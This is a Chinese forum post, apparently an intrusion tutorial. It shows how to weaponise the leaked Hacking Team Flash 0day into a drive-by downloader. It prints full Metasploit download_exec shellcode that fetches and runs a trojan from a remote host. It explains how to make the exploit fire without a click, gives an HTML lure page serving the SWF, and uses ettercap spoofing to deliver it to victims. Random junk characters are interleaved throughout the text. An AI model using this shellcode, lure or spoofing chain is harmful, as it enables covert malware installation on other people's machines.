|
' ~0 R5 f) S6 C4 y
三、flash 0day之手工代码修改制作下载者实例入侵演示 9 _# w: K6 F9 g5 g% T
% W3 [6 v j+ e- X' j/ i& S; m6 a
! h) S$ D$ A7 E1 g2 u# O) t 利用到的工具:
2 @. `2 u' |7 F. u0 q
, [6 p+ D s4 M' J r, k( d! F1 Z# Z% n, Z. b E) }- ~$ b
Msf
) Z) B. a0 G+ h+ B8 z( _: b/ i 7 x$ ?% ^& W) P% i. g9 F: R
& \1 m4 p# A k% O9 I* x4 R
Ettercap
_. p+ J3 J0 R7 R1 c
8 ^! }% c& {" q/ H2 r2 b4 \# W3 T4 p! B) B9 z
Adobe Flash CS6 1 R2 x* y7 A* w& \- i
/ o9 \: x; O5 t
, `" p; b5 {" I; ? Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
( Z( }0 [1 D1 D 5 v8 u j7 `5 p, l$ X2 }0 Q9 q
% U7 N9 W8 M2 G8 q: y 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options . F A: i+ w6 a3 {( \
! A/ d+ L% z& G, Z. B
' z# Y; U/ D$ L$ D* e; H, \' d( M* m
如图:
; ]' I1 J3 B6 U9 w 4 L$ u% \# u' e- h! {1 P" o% e3 P
B* b4 e; @+ Z# ?
! ?) m' J% s; T3 x
0 \8 E: X2 e$ b+ V2 E) ?( t- Y/ w& G4 Q' F; M% ]: i7 I
) }- G) t1 d) Z4 Q! M
/ f! i# ]6 x# ~$ i# t* @' g+ ^7 g# N' t: P l4 o6 s* }5 P0 i4 h
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: . K/ j' d0 f1 ]1 U z: o% y" O# [
; ]3 ~; z* o8 Z$ j
2 D3 z* ]9 O; z1 j- K
0 y6 }2 B% m- N
1 P- W5 t. g% C7 c
6 J* M+ R* w* Z% D3 Z0 N  . J5 J9 u9 T! h% z( @
1 H7 K3 O6 O7 }2 T7 A1 J
1 u% _5 S# o) n5 n 然后执行generate -t dword生成shellcode,如下: 1 ?. g& R6 @6 H& R: u. l
4 I% H% D% k7 F D' E( X% G9 X1 o9 j+ M
 * C8 q7 }/ c, `% n
! H$ p3 s- M# l; z2 [2 D2 M
R5 E0 L" O# A+ g
复制代码到文本下便于我们一会编辑flash exp,如下: % Q/ x# {8 c) S" a. }& \$ h+ J6 A
' j8 Y# |5 K. ~" A/ i
9 d1 j* u0 ~1 y+ o
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 I! a5 }% W. G4 `$ S9 q
8 z/ L: ?( y: o& J7 T, t6 L4 X% w
) `+ z! v) m; M3 v. O% s9 X' F 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 2 _0 @ g" t: \4 i3 K
$ \4 V$ } `" i$ f4 L( m+ B; o- t' ?4 ]8 C) `* J" e( u; ?
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 9 e, D( q9 y) u+ A y4 o& c" ]9 t
) k( C7 a# @9 E& h9 }" ~
3 n$ p3 N$ I# z4 w" Y, b& ^! }5 q
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) g/ s! L$ s9 s. W
8 k' y8 X$ v0 D8 V b9 D
1 U# K+ a: F, j9 Z- A
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
% S% Z+ \+ `# R7 N* L9 r& I/ ~ : A& j$ ^( i q' \9 o2 `
6 t. [) q0 G$ N: _
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
$ k9 r, C; W0 ] x f R9 g) @, S" g8 i F3 t0 W
% ~, c7 `/ s/ O9 z% C 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 5 x" t% R4 ~4 ~9 y" V2 E
3 q8 S6 c0 m1 W2 u$ O( Q0 O; i5 {- k4 x9 b. e7 h
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, - i; w- u* v! Y" Y% y+ q2 R- T
0 E( u) M; A; i7 p- }
+ U" k1 x9 w6 c$ I7 X, k
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ! C& b+ L! O# A: z/ M
8 l# o) A9 n N0 K: K. K5 ~6 r
) J$ o& b/ L1 G
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
d* ] n! F, N+ `9 k& I0 G+ ~ / f2 d0 \+ D- W# C7 l, u/ Z8 \
3 v( r8 E$ E6 R% R% g5 w+ r 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
% n* A8 [) n4 d8 S& G. V
* M3 p% W6 W, U- ~
1 z; K: s; x6 Y 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " g2 ^+ p1 r" M6 ^0 r! p
* }% `# a7 o( S) w+ _! r1 ?! c0 T' W! l9 I, C
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
5 o0 {% m& `- s
! O9 v9 V8 {- S; m! o* ~, V
2 R9 A3 r* l0 F* B# {; |; i 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
6 |$ M$ v3 S; t/ V
6 T/ W9 K) }" V3 U" X. y; u3 Z) [3 j8 k* i
' _( A8 {6 b$ S. B+ R ( @7 I, b6 g2 l7 l3 x
; I* ]+ k4 `* H3 z
! {/ _- w* ]& b) u4 I. W$ v" x
. H8 P' Z: d/ C# [/ L0 i8 \. _9 ^: m
下面我们来修改flash 0day exp,需要修改三个文件,分别为: - K8 ^) Y' E: }: b
0 U- b+ b# w9 U8 E' z p. E
' n. C- n T0 _0 e( \8 i6 d8 x  ! p0 @+ z1 @ @; @) m# L
5 {# @* n1 v% M) L4 k3 @; j r# Y: j
先修改ShellWin32.as,部分源代码如图:
2 C# k! k7 v+ j4 O
9 }" l- `, N0 F4 ~8 }6 W
9 S0 M7 y* a# T 
. Z5 d, R- C( ?3 m
- |: O' L# g* Q$ \
3 K# N8 e* L! A8 v6 i 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
+ ?0 G, \. s$ w' L# r( A2 `; S - K8 \/ X: W1 t) Q
( ^# i# g: r% l
 - e; \0 p7 W+ d" b+ C* Q. S* O
- _9 w8 y! L! ]
' n8 O* {% B1 G9 _: z2 x& R 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 m3 R F m! p* f
1 \, b3 `4 p. i/ ? j
, g8 V Z, Z6 |* _2 H
 2 @5 n: B) e3 ^. s) u4 c
. V' Y4 |1 K2 t' `2 w: K# h/ @. [
, h! K) p' d5 d; Z* U 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
0 Q9 |" m6 M' I7 N# q4 |$ z2 i! x
1 x9 s) G+ Y, l/ @% @+ t2 {* {8 Y: S6 U5 R: F, R; {5 J" q2 f4 u& H- s- `
3 C4 C: Y/ f: G$ x7 T
$ h$ _4 ~% J! P9 B
) q$ f7 N9 }# ?1 Z- I
0 G; J$ m, T$ N2 s4 z2 Q 8 k9 n4 u* k2 \3 `
8 i/ M! P t( K1 Z% l# Y: x1 C. S
1 s- L, S* @7 B* N( \
j) A6 _8 i+ E. ~, V2 s
8 N; Z$ n$ p7 O 然后点保存,下面我们来编译一下,打开
$ B* ^) }+ g; A0 o/ ~9 a1 I; O: } * d- n9 {; o- i9 R6 q! l
/ u: ~( K& g1 E; q4 o& Q exp1.fla然后点文件-发布,看看编译没错误
" G8 H, a0 e% @8 J/ G5 ` m% Q9 Q2 V8 K$ {# K: x
& A7 j4 W% F2 T$ ]# ?, m 7 ]8 ]. [. U+ m) u5 m4 O6 d2 j0 w
; D1 g+ b1 X l; U8 d7 O2 G5 L* u# p, a, e u+ [' K. A5 k6 x
8 x0 I Z$ R/ z$ m6 k+ ^ J
+ L+ r" o6 y7 s
0 F. A- F0 U9 f f; j; \
; g: ?! D$ ?. m' V# c8 z5 |8 P% X ' r' g! L) ]- k# y7 F3 P
4 f5 i0 Z2 P# \# Q: d# C p 
+ x+ ?8 o' C/ `" X8 W- _
9 {: |4 Y$ H* E4 b7 N# ~' K& m+ G1 O# e
然后我们把生成的 & n" \" e6 b9 t- m4 ~3 l& y
: y8 [& P+ K2 E1 @( U2 F
( q/ x" b) R- L7 V; s% T1 u
exp1.swf丢到kailinux 的/var/www/html下: ; N3 A+ D! c( v' ^6 l# H
% F, u) y! V9 U7 P" I4 N" o
6 p! u+ G/ n$ s 然后把这段代码好好编辑一下 ) D& a" u- {) ?
% C- D- z5 {! X% H
: K9 c* A+ D% p6 j( I2 o
$ Y$ _1 Z4 u; t& n1 I& [5 b# Q 4 I; o4 q5 }7 x- B# h: w7 l8 }3 Y
2 N5 p. O, ?# I0 Y
8 D2 }/ z2 B4 ^ O, Y
7 b0 v( i9 H% S$ ?+ v% U- K
2 S1 j: T0 t. Y2 g! E! u
+ Q% f# T q) }' K# o7 a' ]5 U
6 ]) ^8 o' @# s* _* Y% v" [# l3 W1 ~: q! T& B' S& G
" l+ C0 G2 v$ k% _, d1 ~1 f. v
2 O& U4 l8 t& x
' S% N( \0 @# ]
) S* D! l6 C( g7 _& n: ^" m* b
/ C( N* O( _6 U
2 M- N- s9 C8 I0 ?! ] 0 L* b8 j" _4 m0 d: e8 x: L+ s
' T5 j1 V5 _/ B
( J5 n' m' k7 W: s# b4 q b; h$ c! i <!DOCTYPE html> 0 x- p& Q0 f; X2 `- S% b O, k
& |1 |' O; u. J: `( O8 I: |% ~- Z7 j8 S
<html>
) s1 D3 ^9 o! s
/ [6 [0 A( x, U! C$ N0 X' i0 p* m' }% \3 R2 I$ ` S/ {
<head> . K! K2 e! b- r0 C) G5 E
+ P. g) L2 T a) S- H
7 P6 z8 R3 h/ A) G8 [3 p& w <meta http-equiv="Content-Type" content="text/html; 1 v: q. a8 c }1 s1 [4 ?; Q
! s& }( K, W/ l$ D6 B6 x z5 b: T
% n; L5 E% i! x. j" U6 v9 k
charset=utf-8"/> + y1 X1 h% ]' Z" U9 r+ H3 s3 M* l
: T& F# V ^& z# j
) e( F. O" F/ _
</head>
5 X& |2 n$ F' f# K
- f$ R0 X7 q" Z2 o8 ^
, T. V! l* @" u8 h <body>
/ } a9 C% f" W9 z" a
* y+ z+ q( O; n& g) ~! r/ }+ b7 A% ?5 o4 u, O2 e! T
<h2> Please wait, the requested page is loading...</h2>
+ J K( X* E6 y/ Q" H , m# f0 Q/ T" ]5 o4 J
: |7 u: }1 m7 a8 F9 {. m6 g <br>
3 m, D( d* l3 G
# C% e% u, e2 P. D0 H' G! n' ^" Q/ a+ ~
<OBJECT 0 q& h G% R. m
' N6 G5 J9 H$ W% d4 R: `6 F' X! H; d- T0 x
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
: Z" I/ I# h: U# L/ P% g, |
6 \1 @" _8 F1 J5 P7 r
. W: S8 O3 g0 c4 ?* b2 u ~. c! n3 Q VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 2 K0 ]% f! h! O+ H9 m$ q- a% P# I
' \5 h4 x: |- o- n; u; t9 `: b" {5 Z" b
</body> & _# x8 W* Z0 N
3 e4 N1 \$ r ~8 g) Z+ w
* \- y- Z5 d' ]/ u6 z
<script> 6 X" ?, R. Z" Q0 b. S
; |7 C/ o U( e; C# I0 s5 t' a
3 E5 l( I# {' r# Y setTimeout(function () {
5 \/ p- u/ x- V
# J& g- I3 n# ?( Q5 R- x) A5 x9 h2 t. i( @* y4 ?; C
( e, ?# i9 b7 T- b
; O% F( l& ~! N, M8 q$ \) v
1 e$ J7 R- j# I+ z- t+ K% ] window.location.reload();
; t2 }, c }# [. e
( u8 G) N5 x3 U! W0 V- o2 z9 u6 o
* j X# ^4 G# M/ g4 Z7 r }, 10000);
# W9 m" l! n" `5 v; S # W! s0 }2 ~, F. }5 c
, b9 D) g& m3 i, p, n3 {
# `2 r5 E' b5 J4 x5 f6 j , H' F" S. \" d& a/ g( d$ j+ O" U
; U3 ~( J* \& ]5 u2 _9 H </script> 5 ^- B; J" V, V$ I
& o2 k/ d* U. x% o6 t v' q9 l/ w
! {4 s1 @( k2 p) P; T0 ^ K$ X+ h
</html> 8 @! N8 O: p* Q. }
9 N u: W! Z: V: \* e7 z/ K C/ ?) ~8 r7 Y ?
0 s: e3 a) Z9 O+ H) D3 A . K5 k' I! n) `# b# v1 H+ @
* e4 n. z" Y- [
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: $ v0 j0 W# s+ r/ _& L2 b& T
- ?# H4 A( W2 b( L& C
- |" ^; C4 v5 |( M5 m k* z5 @ 
3 h5 U' m4 h8 ?; p; {9 p * \3 |" L9 s G( ~
* C3 Y# m, D% ?
- W8 \( C9 S! w9 }; z# x
( \ p7 F4 O# D
R% m0 f8 \ z* u6 F* h$ w 8 Q o8 y |5 h& `1 Q- n, {" A
/ g; Y& @* }) Y0 }% [ h+ c
+ ^9 [. H" _0 r
6 n3 q; m8 B, g0 a$ j 6 h I! R. X" L9 T( {8 j h
) w9 ~" A8 @/ h* F/ X3 }
" o+ x! W$ C" A* {& }
( \/ F1 F3 [4 v" _: i* v( K+ A( _: Z0 w
下面我们用ettercap欺骗如图:
8 c1 e7 p5 X6 o6 D0 r- U; P4 Q
' d1 i& P( {* Q1 L4 B1 b" A/ Q. O" _4 [& [: ?' r& ?# Q, ~& K8 V1 |2 d
0 r/ X- i' @( N# { Z0 e+ R ) W. ]' w6 C0 b
8 Z% k4 F- b. p3 |6 F$ a 3 {/ C9 P2 E* v7 [4 M% Q g
; Y. j' `7 m) z% C$ H1 [& k- Y: I. E6 s8 e$ y9 m
下面我们随便访问个网站看看: 7 a! D0 C' A0 [9 Z; d$ n3 u
- S; a7 C+ E3 ?, ]6 \: c
0 P7 B/ {- L) n( _% {8 j# l 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! s. n9 w, P) C" A, i0 L
1 x) `' R4 L s6 `* [) L
. c* t3 i3 C+ h, Q7 @% R  # A. e1 u. D/ I
# ~* w" x, G9 K! t' [2 u
/ i3 G V4 G' q0 Z3 _ 我们看另一台,
& r1 v" Z% @$ ^7 q! R, `6 g7 Z
, K/ F! ^4 a8 y2 n0 G- G- ~: O) W" t$ I4 [
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
8 R: Y0 B K6 r! E* z | 
发表于 2018-10-20 20:28:55
收藏
支持
反对